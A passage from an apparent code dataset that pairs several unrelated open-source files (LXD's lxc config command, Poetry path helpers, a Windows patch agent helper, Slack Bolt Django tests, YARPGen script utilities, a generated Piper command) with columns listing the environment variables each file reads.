"### devices:\n" +
"### eth0:\n" +
"### nictype: bridged\n" +
"### parent: lxcbr0\n" +
"### type: nic\n" +
"###\n" +
"### Note that the name cannot be changed\n")
func (c *configCmd) usage() string {
return gettext.Gettext(
"Manage configuration.\n" +
"\n" +
"lxc config get <container> key Get configuration key\n" +
"lxc config device add <resource> <name> <type> [key=value]...\n" +
" Add a device to a resource\n" +
"lxc config device list <resource> List devices for resource\n" +
"lxc config device remove <resource> <name> Remove device from resource\n" +
"lxc config profile list [filters] List profiles\n" +
"lxc config profile create <profile> Create profile\n" +
"lxc config profile delete <profile> Delete profile\n" +
"lxc config profile device add <profile> <name> <type> [key=value]...\n" +
" Delete profile\n" +
"lxc config profile edit <profile> Edit profile in external editor\n" +
"lxc config profile device list <profile>\n" +
"lxc config profile device remove <profile> <name>\n" +
"lxc config profile set <profile> <key> <value> Set profile configuration\n" +
"lxc config profile apply <resource> <profile> Apply profile to container\n" +
"lxc config set [remote] password <newpwd> Set admin password\n" +
"lxc config set <container> key [value] Set container configuration key\n" +
"lxc config show <container> Show container configuration\n" +
"lxc config trust list [remote] List all trusted certs.\n" +
"lxc config trust add [remote] [certfile.crt] Add certfile.crt to trusted hosts.\n" +
"lxc config trust remove [remote] [hostname|fingerprint]\n" +
" Remove the cert from trusted hosts.\n")
}
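// Illustrative invocations only (container, profile and device names are made up):
//   lxc config set mycontainer limits.memory 200000
//   lxc config device add mycontainer homedir disk source=/srv/data path=/data
//   lxc config profile apply mycontainer myprofile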
func (c *configCmd) flags() {}
func doSet(config *lxd.Config, args []string) error {
// [[lxc config]] set dakara:c1 limits.memory 200000
remote, container := config.ParseRemoteAndContainer(args[1])
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
key := args[2]
var value string
if len(args) < 4 {
value = ""
} else {
value = args[3]
}
resp, err := d.SetContainerConfig(container, key, value)
if err != nil {
return err
}
return d.WaitForSuccess(resp.Operation)
}
func (c *configCmd) run(config *lxd.Config, args []string) error {
if len(args) < 1 {
return errArgs
}
switch args[0] {
case "unset":
if len(args) < 3 {
return errArgs
}
return doSet(config, args)
case "set":
if len(args) < 2 {
return errArgs
}
if args[1] == "password" {
if len(args) != 3 {
return errArgs
}
password := args[2]
c, err := lxd.NewClient(config, "")
if err != nil {
return err
}
_, err = c.SetRemotePwd(password)
return err
}
if len(args) < 3 {
return errArgs
}
return doSet(config, args)
case "trust":
if len(args) < 2 {
return errArgs
}
switch args[1] {
case "list":
var remote string
if len(args) == 3 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
trust, err := d.CertificateList()
if err != nil {
return err
}
for host, fingerprint := range trust {
fmt.Println(fmt.Sprintf("%s: %s", host, fingerprint))
}
return nil
case "add":
var remote string
if len(args) < 3 {
return fmt.Errorf(gettext.Gettext("No cert provided to add"))
} else if len(args) == 4 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
fname := args[len(args)-1]
cert, err := shared.ReadCert(fname)
if err != nil {
return err
}
name, _ := shared.SplitExt(fname)
return d.CertificateAdd(cert, name)
case "remove":
var remote string
if len(args) < 3 {
return fmt.Errorf(gettext.Gettext("No fingerprint specified."))
} else if len(args) == 4 {
remote = config.ParseRemote(args[2])
} else {
remote = config.DefaultRemote
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
toRemove := args[len(args)-1]
trust, err := d.CertificateList()
if err != nil {
return err
}
/* Try to remove by hostname first. */
for host, fingerprint := range trust {
if host == toRemove {
return d.CertificateRemove(fingerprint)
}
}
return d.CertificateRemove(args[len(args)-1])
default:
return fmt.Errorf(gettext.Gettext("Unkonwn config trust command %s"), args[1])
}
case "show":
if len(args) == 1 {
return fmt.Errorf(gettext.Gettext("Show for server is not yet supported\n"))
}
remote, container := config.ParseRemoteAndContainer(args[1])
if container == "" {
return fmt.Errorf(gettext.Gettext("Show for remotes is not yet supported\n"))
}
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
resp, err := d.GetContainerConfig(container)
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(resp, "\n"))
return nil
case "get":
if len(args) != 3 {
return errArgs
}
remote, container := config.ParseRemoteAndContainer(args[1])
d, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
resp, err := d.ContainerStatus(container)
if err != nil {
return err
}
fmt.Printf("%s: %s\n", args[2], resp.Config[args[2]])
return nil
case "profile":
if len(args) < 2 {
return errArgs
}
if args[1] == "list" {
return doProfileList(config, args)
}
if len(args) < 3 {
return errArgs
}
if args[1] == "device" {
return doProfileDevice(config, args)
}
remote, profile := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
switch args[1] {
case "create":
return doProfileCreate(client, profile)
case "delete":
return doProfileDelete(client, profile)
case "edit":
return doProfileEdit(client, profile)
case "apply":
container := profile
switch len(args) {
case 3:
profile = ""
case 4:
profile = args[3]
default:
return errArgs
}
return doProfileApply(client, container, profile)
case "get":
return doProfileGet(client, profile, args[3:])
case "set":
return doProfileSet(client, profile, args[3:])
case "unset":
return doProfileSet(client, profile, args[3:])
case "copy":
return doProfileCopy(config, client, profile, args[3:])
case "show":
return doProfileShow(client, profile)
}
case "device":
if len(args) < 2 {
return errArgs
}
switch args[1] {
case "list":
return deviceList(config, "container", args)
case "add":
return deviceAdd(config, "container", args)
case "remove":
return deviceRm(config, "container", args)
default:
return errArgs
}
default:
return errArgs
}
return errArgs
}
func doProfileCreate(client *lxd.Client, p string) error {
err := client.ProfileCreate(p)
if err == nil {
fmt.Printf(gettext.Gettext("Profile %s created\n"), p)
}
return err
}
func doProfileEdit(client *lxd.Client, p string) error {
profile, err := client.ProfileConfig(p)
if err != nil {
return err
}
editor := os.Getenv("VISUAL")
if editor == "" {
editor = os.Getenv("EDITOR")
if editor == "" {
editor = "vi"
}
}
data, err := yaml.Marshal(&profile)
f, err := ioutil.TempFile("", "lxc_profile_")
if err != nil {
return err
}
fname := f.Name()
if err = f.Chmod(0700); err != nil {
f.Close()
os.Remove(fname)
return err
}
f.Write([]byte(profileEditHelp))
f.Write(data)
f.Close()
defer os.Remove(fname)
cmd := exec.Command(editor, fname)
cmd.Stdin = os.Stdin
cmd.Stdout = os.Stdout
cmd.Stderr = os.Stderr
err = cmd.Run()
if err != nil {
return err
}
contents, err := ioutil.ReadFile(fname)
if err != nil {
return err
}
newdata := shared.ProfileConfig{}
err = yaml.Unmarshal(contents, &newdata)
if err != nil {
return err
}
err = client.PutProfile(p, newdata)
return err
}
func doProfileDelete(client *lxd.Client, p string) error {
err := client.ProfileDelete(p)
if err == nil {
fmt.Printf(gettext.Gettext("Profile %s deleted\n"), p)
}
return err
}
func doProfileApply(client *lxd.Client, c string, p string) error {
resp, err := client.ApplyProfile(c, p)
if err == nil {
if p == "" {
p = "(none)"
}
fmt.Printf(gettext.Gettext("Profile %s applied to %s\n"), p, c)
} else {
return err
}
return client.WaitForSuccess(resp.Operation)
}
func doProfileShow(client *lxd.Client, p string) error {
resp, err := client.GetProfileConfig(p)
if err != nil {
return err
}
for k, v := range resp {
fmt.Printf("%s = %s\n", k, v)
}
dresp, err := client.ProfileListDevices(p)
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(dresp, "\n"))
return nil
}
func doProfileCopy(config *lxd.Config, client *lxd.Client, p string, args []string) error {
if len(args) != 1 {
return errArgs
}
remote, newname := config.ParseRemoteAndContainer(args[0])
if newname == "" {
newname = p
}
dest, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
return client.ProfileCopy(p, newname, dest)
}
func doProfileDevice(config *lxd.Config, args []string) error {
// profile device add b1 eth0 nic type=bridged
// profile device list b1
// profile device remove b1 eth0
if len(args) < 4 {
return errArgs
}
switch args[2] {
case "add":
return deviceAdd(config, "profile", args[1:])
case "remove":
return deviceRm(config, "profile", args[1:])
case "list":
return deviceList(config, "profile", args[1:])
default:
return errArgs
}
}
func doProfileGet(client *lxd.Client, p string, args []string) error {
// we shifted @args, so it should read "<key>"
if len(args) != 1 {
return errArgs
}
resp, err := client.GetProfileConfig(p)
if err != nil {
return err
}
for k, v := range resp {
if k == args[0] {
fmt.Printf("%s\n", v)
}
}
return nil
}
func doProfileSet(client *lxd.Client, p string, args []string) error {
// we shifted @args, so it should read "<key> [<value>]"
if len(args) < 1 {
return errArgs
}
key := args[0]
var value string
if len(args) < 2 {
value = ""
} else {
value = args[1]
}
err := client.SetProfileConfigItem(p, key, value)
return err
}
func doProfileList(config *lxd.Config, args []string) error {
var remote string
if len(args) > 2 {
var name string
remote, name = config.ParseRemoteAndContainer(args[2])
if name != "" {
return fmt.Errorf(gettext.Gettext("Cannot provide container name to list"))
}
} else {
remote = config.DefaultRemote
}
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
profiles, err := client.ListProfiles()
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(profiles, "\n"))
return nil
}
func deviceAdd(config *lxd.Config, which string, args []string) error {
if len(args) < 5 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
devname := args[3]
devtype := args[4]
var props []string
if len(args) > 5 {
props = args[5:]
} else {
props = []string{}
}
var resp *lxd.Response
if which == "profile" {
resp, err = client.ProfileDeviceAdd(name, devname, devtype, props)
} else {
resp, err = client.ContainerDeviceAdd(name, devname, devtype, props)
}
if err != nil {
return err
}
fmt.Printf(gettext.Gettext("Device %s added to %s\n"), devname, name)
if which == "profile" {
return nil
}
return client.WaitForSuccess(resp.Operation)
}
func deviceRm(config *lxd.Config, which string, args []string) error {
if len(args) < 4 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
devname := args[3]
var resp *lxd.Response
if which == "profile" {
resp, err = client.ProfileDeviceDelete(name, devname)
} else {
resp, err = client.ContainerDeviceDelete(name, devname)
}
if err != nil {
return err
}
fmt.Printf(gettext.Gettext("Device %s removed from %s\n"), devname, name)
if which == "profile" {
return nil
}
return client.WaitForSuccess(resp.Operation)
}
func deviceList(config *lxd.Config, which string, args []string) error {
if len(args) < 3 {
return errArgs
}
remote, name := config.ParseRemoteAndContainer(args[2])
client, err := lxd.NewClient(config, remote)
if err != nil {
return err
}
var resp []string
if which == "profile" {
resp, err = client.ProfileListDevices(name)
} else {
resp, err = client.ContainerListDevices(name)
}
if err != nil {
return err
}
fmt.Printf("%s\n", strings.Join(resp, "\n"))
return nil
}
| [
"\"VISUAL\"",
"\"EDITOR\""
]
| []
| [
"VISUAL",
"EDITOR"
]
| [] | ["VISUAL", "EDITOR"] | go | 2 | 0 | |
src/poetry/locations.py | import os
from pathlib import Path
from poetry.utils.appdirs import user_cache_dir
from poetry.utils.appdirs import user_config_dir
from poetry.utils.appdirs import user_data_dir
CACHE_DIR = user_cache_dir("pypoetry")
DATA_DIR = user_data_dir("pypoetry")
CONFIG_DIR = user_config_dir("pypoetry")
REPOSITORY_CACHE_DIR = Path(CACHE_DIR) / "cache" / "repositories"
def data_dir() -> Path:
poetry_home = os.getenv("POETRY_HOME")
if poetry_home:
return Path(poetry_home).expanduser()
return Path(user_data_dir("pypoetry", roaming=True))
| []
| []
| [
"POETRY_HOME"
]
| [] | ["POETRY_HOME"] | python | 1 | 0 | |
ospatchog/system_windows.go | // Copyright 2019 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//+build !test
package ospatchog
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"time"
"github.com/GoogleCloudPlatform/guest-logging-go/logger"
"golang.org/x/sys/windows/registry"
)
// disableAutoUpdates disables system auto updates.
func disableAutoUpdates() {
k, openedExisting, err := registry.CreateKey(registry.LOCAL_MACHINE, `SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU`, registry.ALL_ACCESS)
if err != nil {
logger.Errorf("error disabling Windows auto updates, error: %v", err)
}
defer k.Close()
if openedExisting {
val, _, err := k.GetIntegerValue("NoAutoUpdate")
if err == nil && val == 1 {
return
}
}
logger.Debugf("Disabling Windows Auto Updates")
if err := k.SetDWordValue("NoAutoUpdate", 1); err != nil {
logger.Errorf("error disabling Windows auto updates, error: %v", err)
}
if _, err := os.Stat(`C:\Program Files\Google\Compute Engine\tools\auto_updater.ps1`); err == nil {
logger.Debugf("Removing google-compute-engine-auto-updater package")
f := func() error {
out, err := exec.Command(googet, "-noconfirm", "remove", "google-compute-engine-auto-updater").CombinedOutput()
if err != nil {
return fmt.Errorf("%v, out: %s", err, out)
}
return nil
}
if err := retry(1*time.Minute, "removing google-compute-engine-auto-updater package", logger.Debugf, f); err != nil {
logger.Errorf("Error removing google-compute-engine-auto-updater: %v", err)
}
}
}
func rebootSystem() error {
root := os.Getenv("SystemRoot")
if root == "" {
root = `C:\Windows`
}
return exec.Command(filepath.Join(root, `System32\shutdown.exe`), "/r", "/t", "00", "/f", "/d", "p:2:3").Run()
}
| [
"\"SystemRoot\""
]
| []
| [
"SystemRoot"
]
| [] | ["SystemRoot"] | go | 1 | 0 | |
tests/adapter_tests/django/test_django.py | import json
import os
from time import time
from urllib.parse import quote
from django.test import TestCase
from django.test.client import RequestFactory
from slack_sdk.signature import SignatureVerifier
from slack_sdk.web import WebClient
from slack_bolt.adapter.django import SlackRequestHandler
from slack_bolt.app import App
from slack_bolt.oauth.oauth_settings import OAuthSettings
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
assert_auth_test_count,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
class TestDjango(TestCase):
signing_secret = "secret"
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
signature_verifier = SignatureVerifier(signing_secret)
web_client = WebClient(
token=valid_token,
base_url=mock_api_server_base_url,
)
os.environ[
"DJANGO_SETTINGS_MODULE"
] = "tests.adapter_tests.django.test_django_settings"
rf = RequestFactory()
def setUp(self):
self.old_os_env = remove_os_env_temporarily()
setup_mock_web_api_server(self)
def tearDown(self):
cleanup_mock_web_api_server(self)
restore_os_env(self.old_os_env)
def generate_signature(self, body: str, timestamp: str):
return self.signature_verifier.generate_signature(
body=body,
timestamp=timestamp,
)
def build_headers(self, timestamp: str, body: str):
return {
"x-slack-signature": [self.generate_signature(body, timestamp)],
"x-slack-request-timestamp": [timestamp],
}
def test_events(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def event_handler():
pass
app.event("app_mention")(event_handler)
input = {
"token": "verification_token",
"team_id": "T111",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {
"client_msg_id": "9cbd4c5b-7ddf-4ede-b479-ad21fca66d63",
"type": "app_mention",
"text": "<@W111> Hi there!",
"user": "W222",
"ts": "1595926230.009600",
"team": "T111",
"channel": "C111",
"event_ts": "1595926230.009600",
},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1595926230,
"authed_users": ["W111"],
}
timestamp, body = str(int(time())), json.dumps(input)
request = self.rf.post(
"/slack/events", data=body, content_type="application/json"
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_shortcuts(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def shortcut_handler(ack):
ack()
app.shortcut("test-shortcut")(shortcut_handler)
input = {
"type": "shortcut",
"token": "verification_token",
"action_ts": "111.111",
"team": {
"id": "T111",
"domain": "workspace-domain",
"enterprise_id": "E111",
"enterprise_name": "Org Name",
},
"user": {"id": "W111", "username": "primary-owner", "team_id": "T111"},
"callback_id": "test-shortcut",
"trigger_id": "111.111.xxxxxx",
}
timestamp, body = str(int(time())), f"payload={quote(json.dumps(input))}"
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def command_handler(ack):
ack()
app.command("/hello-world")(command_handler)
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands_process_before_response(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
process_before_response=True,
)
def command_handler(ack):
ack()
app.command("/hello-world")(command_handler)
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_commands_lazy(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
)
def command_handler(ack):
ack()
def lazy_handler():
pass
app.command("/hello-world")(ack=command_handler, lazy=[lazy_handler])
input = (
"token=verification_token"
"&team_id=T111"
"&team_domain=test-domain"
"&channel_id=C111"
"&channel_name=random"
"&user_id=W111"
"&user_name=primary-owner"
"&command=%2Fhello-world"
"&text=Hi"
"&enterprise_id=E111"
"&enterprise_name=Org+Name"
"&response_url=https%3A%2F%2Fhooks.slack.com%2Fcommands%2FT111%2F111%2Fxxxxx"
"&trigger_id=111.111.xxx"
)
timestamp, body = str(int(time())), input
request = self.rf.post(
"/slack/events",
data=body,
content_type="application/x-www-form-urlencoded",
)
request.headers = self.build_headers(timestamp, body)
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert_auth_test_count(self, 1)
def test_oauth(self):
app = App(
client=self.web_client,
signing_secret=self.signing_secret,
oauth_settings=OAuthSettings(
client_id="111.111",
client_secret="xxx",
scopes=["chat:write", "commands"],
),
)
request = self.rf.get("/slack/install")
response = SlackRequestHandler(app).handle(request)
assert response.status_code == 200
assert response.get("content-type") == "text/html; charset=utf-8"
assert "https://slack.com/oauth/v2/authorize?state=" in response.content.decode(
"utf-8"
)
| []
| []
| [
"DJANGO_SETTINGS_MODULE\"\n "
]
| [] | ["DJANGO_SETTINGS_MODULE\"\n "] | python | 1 | 0 | |
scripts/common.py | #!/usr/bin/python3
###############################################################################
#
# Copyright (c) 2015-2020, Intel Corporation
# Copyright (c) 2019-2020, University of Utah
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###############################################################################
"""
File for common data and functions, which are used in scripts
"""
###############################################################################
import collections
import datetime
import enum
import errno
import logging
import os
import shutil
import signal
import subprocess
import sys
scripts_dir_name = "scripts"
# $YARPGEN_HOME environment variable should be set to YARPGen directory
yarpgen_home = os.environ["YARPGEN_HOME"] if "YARPGEN_HOME" in os.environ else os.getcwd()
yarpgen_scripts = os.path.join(os.environ["YARPGEN_HOME"], scripts_dir_name) if "YARPGEN_HOME" in os.environ else os.getcwd()
yarpgen_version_str = ""
main_logger_name = "main_logger"
main_logger = None
__duplicate_err_to_stderr__ = False
stat_logger_name = "stat_logger"
stat_logger = None
@enum.unique
class StdID(enum.IntEnum):
# Better to use enum.auto, but it is available only since python3.6
C = enum.auto()
CXX = enum.auto()
SYCL = enum.auto()
ISPC = enum.auto()
MAX_STD_ID = enum.auto()
def is_c (self):
return self.value == StdID.C
def is_cxx (self):
return self.value == StdID.CXX or \
self.value == StdID.SYCL or \
self.value == StdID.ISPC
''' Enum doesn't allow using '++' in names, so we need this function. '''
@staticmethod
def get_pretty_std_name (std_id):
if std_id == StdID.CXX:
return std_id.name.replace("CXX", "c++")
return std_id.name.lower()
''' Enum doesn't allow using '++' in names, so we need this function. '''
def get_full_pretty_std_name (self):
if self.is_cxx():
return "c++11"
return "c99"
''' Easy way to convert string to StdID '''
StrToStdID = collections.OrderedDict()
for i in StdID:
if not i.name.startswith("MAX"):
StrToStdID[StdID.get_pretty_std_name(i)] = i
selected_standard = None
def get_file_ext():
if selected_standard.is_c():
return ".c"
if selected_standard.is_cxx():
return ".cpp"
return None
def append_file_ext(file):
if (file.startswith("func") and selected_standard == StdID.ISPC):
return file + ".ispc"
if selected_standard.is_c():
return file + ".c"
if selected_standard.is_cxx():
return file + ".cpp"
return None
def set_standard(std_str):
global selected_standard
selected_standard = StrToStdID[std_str]
def get_standard ():
global selected_standard
return StdID.get_pretty_std_name(selected_standard)
def check_if_std_defined ():
if selected_standard is None or \
selected_standard == StdID.MAX_STD_ID:
print_and_exit("Language standard wasn't selected!")
def print_and_exit(msg):
log_msg(logging.ERROR, msg)
exit(-1)
def setup_logger(log_file, log_level):
global main_logger
main_logger = logging.getLogger(main_logger_name)
formatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
main_logger.setLevel(log_level)
if log_file is not None:
file_handler = logging.FileHandler(log_file)
file_handler.setFormatter(formatter)
main_logger.addHandler(file_handler)
global __duplicate_err_to_stderr__
__duplicate_err_to_stderr__ = True
else:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(formatter)
main_logger.addHandler(stream_handler)
def wrap_log_file(log_file, default_log_file):
if log_file == default_log_file:
log_file = log_file.replace(".log", "")
return log_file + "_" + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + ".log"
else:
return log_file
def log_msg(log_level, message, forced_duplication = False):
global main_logger
main_logger.log(log_level, message)
if __duplicate_err_to_stderr__ and (log_level == logging.ERROR or forced_duplication):
sys.stderr.write("\n" + str(message) + "\n")
sys.stderr.flush()
class StatisticsFileHandler(logging.FileHandler):
def emit(self, record):
if self.stream is None:
self.stream = self._open()
logging.StreamHandler.emit(self, record)
self.close()
def setup_stat_logger(log_file):
global stat_logger
stat_logger = logging.getLogger(stat_logger_name)
if log_file is not None:
stat_handler = StatisticsFileHandler(filename=log_file, mode="w", delay=True)
stat_logger.addHandler(stat_handler)
stat_logger.setLevel(logging.INFO)
def check_python_version():
if sys.version_info < (3, 6):
print_and_exit("This script requires at least python 3.6 (enum.auto is used).")
def check_and_open_file(file_name, mode):
norm_file_name = os.path.abspath(file_name)
if not os.path.isfile(norm_file_name):
print_and_exit("File " + norm_file_name + " doesn't exist and can't be opened")
return open(norm_file_name, mode)
def check_and_copy(src, dst):
if not isinstance(src, str) or not isinstance(dst, str):
print_and_exit("Src and dst should be strings")
norm_src = os.path.abspath(src)
norm_dst = os.path.abspath(dst)
if os.path.exists(norm_src):
log_msg(logging.DEBUG, "Copying " + norm_src + " to " + norm_dst)
if os.path.isfile(norm_src):
shutil.copy(norm_src, norm_dst)
elif os.path.isdir(norm_src):
# for directories, destination should be not the dir where it will be
# copied to, but the new directory name. I.e. copying "abc" to ".." we
# need to provide destination as "../abc".
shutil.copytree(norm_src, norm_dst + os.sep + os.path.basename(src))
else:
print_and_exit("Can't copy " + norm_src)
else:
print_and_exit("File " + norm_src + " wasn't found")
def copy_test_to_out(test_dir, out_dir, lock):
log_msg(logging.DEBUG, "Copying " + test_dir + " to " + out_dir)
lock.acquire()
try:
shutil.copytree(test_dir, out_dir)
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
finally:
lock.release()
def check_if_dir_exists(directory):
norm_dir = os.path.abspath(directory)
if not os.path.exists(norm_dir) or not os.path.isdir(norm_dir):
return False
return True
def check_dir_and_create(directory):
norm_dir = os.path.abspath(directory)
if not os.path.exists(norm_dir):
log_msg(logging.DEBUG, "Creating '" + str(norm_dir) + "' directory")
os.makedirs(norm_dir)
elif not os.path.isdir(norm_dir):
print_and_exit("Can't use '" + norm_dir + "' directory")
def run_cmd(cmd, time_out=None, num=-1, memory_limit=None):
is_time_expired = False
shell = False
if memory_limit is not None:
shell = True
new_cmd = "ulimit -v " + str(memory_limit) + " ; "
new_cmd += " ".join(i for i in cmd)
cmd = new_cmd
start_time = os.times()
with subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, start_new_session=True, shell=shell) as process:
try:
log_msg_str = "Running " + str(cmd)
if num != -1:
log_msg_str += " in process " + str(num)
if time_out is None:
log_msg_str += " without timeout"
else:
log_msg_str += " with " + str(time_out) + " timeout"
log_msg(logging.DEBUG, log_msg_str)
output, err_output = process.communicate(timeout=time_out)
ret_code = process.poll()
except subprocess.TimeoutExpired:
log_msg(logging.DEBUG, "Timeout triggered for proc num " + str(process.pid) + " sending kill signal to group")
# Sigterm is good enough here and compared to sigkill gives a chance to the processes
# to clean up after themselves.
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
# once in a while stdout/stderr may not exist when the process is killed, so using try.
try:
output, err_output = process.communicate()
except ValueError:
output = b''
err_output = b''
log_msg(logging.DEBUG, "Procces " + str(process.pid) + " has finally died")
is_time_expired = True
ret_code = None
except:
log_msg(logging.ERROR, str(cmd) + " failed: unknown exception (proc num "+ str(process.pid) + ")")
# Something really bad is going on, so better to send sigkill
os.killpg(os.getpgid(process.pid), signal.SIGKILL)
process.wait()
            log_msg(logging.DEBUG, "Process " + str(process.pid) + " has finally died")
raise
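        # elapsed_time is the CPU time consumed by child processes (user + system), not wall-clock time.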
end_time = os.times()
elapsed_time = end_time.children_user - start_time.children_user + \
end_time.children_system - start_time.children_system
return ret_code, output, err_output, is_time_expired, elapsed_time
def if_exec_exist(program):
def is_exe(file_path):
return os.path.isfile(file_path) and os.access(file_path, os.X_OK)
log_msg(logging.DEBUG, "Checking if " + str(program) + " exists")
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
log_msg(logging.DEBUG, "Exec " + program + " was found at " + program)
return True
else:
for path in os.environ["PATH"].split(os.pathsep):
path = path.strip('"')
exe_file = os.path.join(path, program)
if is_exe(exe_file):
log_msg(logging.DEBUG, "Exec " + program + " was found at " + exe_file)
return True
log_msg(logging.DEBUG, "Exec wasn't found")
return False
def clean_dir(path):
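    # Walk the tree bottom-up and delete every file and subdirectory, keeping the top-level path itself.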
for root, dirs, files in os.walk(path, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
| []
| []
| [
"PATH",
"YARPGEN_HOME"
]
| [] | ["PATH", "YARPGEN_HOME"] | python | 2 | 0 | |
cmd/gitopsUpdateDeployment_generated.go | // Code generated by piper's step-generator. DO NOT EDIT.
package cmd
import (
"fmt"
"os"
"time"
"github.com/SAP/jenkins-library/pkg/config"
"github.com/SAP/jenkins-library/pkg/log"
"github.com/SAP/jenkins-library/pkg/splunk"
"github.com/SAP/jenkins-library/pkg/telemetry"
"github.com/SAP/jenkins-library/pkg/validation"
"github.com/spf13/cobra"
)
type gitopsUpdateDeploymentOptions struct {
BranchName string `json:"branchName,omitempty"`
CommitMessage string `json:"commitMessage,omitempty"`
ServerURL string `json:"serverUrl,omitempty"`
Username string `json:"username,omitempty"`
Password string `json:"password,omitempty"`
FilePath string `json:"filePath,omitempty"`
ContainerName string `json:"containerName,omitempty"`
ContainerRegistryURL string `json:"containerRegistryUrl,omitempty"`
ContainerImageNameTag string `json:"containerImageNameTag,omitempty"`
ChartPath string `json:"chartPath,omitempty"`
HelmValues []string `json:"helmValues,omitempty"`
DeploymentName string `json:"deploymentName,omitempty"`
Tool string `json:"tool,omitempty" validate:"possible-values=kubectl helm kustomize"`
}
// GitopsUpdateDeploymentCommand Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository
func GitopsUpdateDeploymentCommand() *cobra.Command {
const STEP_NAME = "gitopsUpdateDeployment"
metadata := gitopsUpdateDeploymentMetadata()
var stepConfig gitopsUpdateDeploymentOptions
var startTime time.Time
var logCollector *log.CollectorHook
var splunkClient *splunk.Splunk
telemetryClient := &telemetry.Telemetry{}
var createGitopsUpdateDeploymentCmd = &cobra.Command{
Use: STEP_NAME,
Short: "Updates Kubernetes Deployment Manifest in an Infrastructure Git Repository",
Long: `This step allows you to update the deployment manifest for Kubernetes in a git repository.
It can for example be used for GitOps scenarios where the update of the manifests triggers an update of the corresponding deployment in Kubernetes.
As of today, it supports the update of deployment yaml files via kubectl patch, update a whole helm template and kustomize.
For *kubectl* the container inside the yaml must be described within the following hierarchy: ` + "`" + `{"spec":{"template":{"spec":{"containers":[{...}]}}}}` + "`" + `
For *helm* the whole template is generated into a single file (` + "`" + `filePath` + "`" + `) and uploaded into the repository.
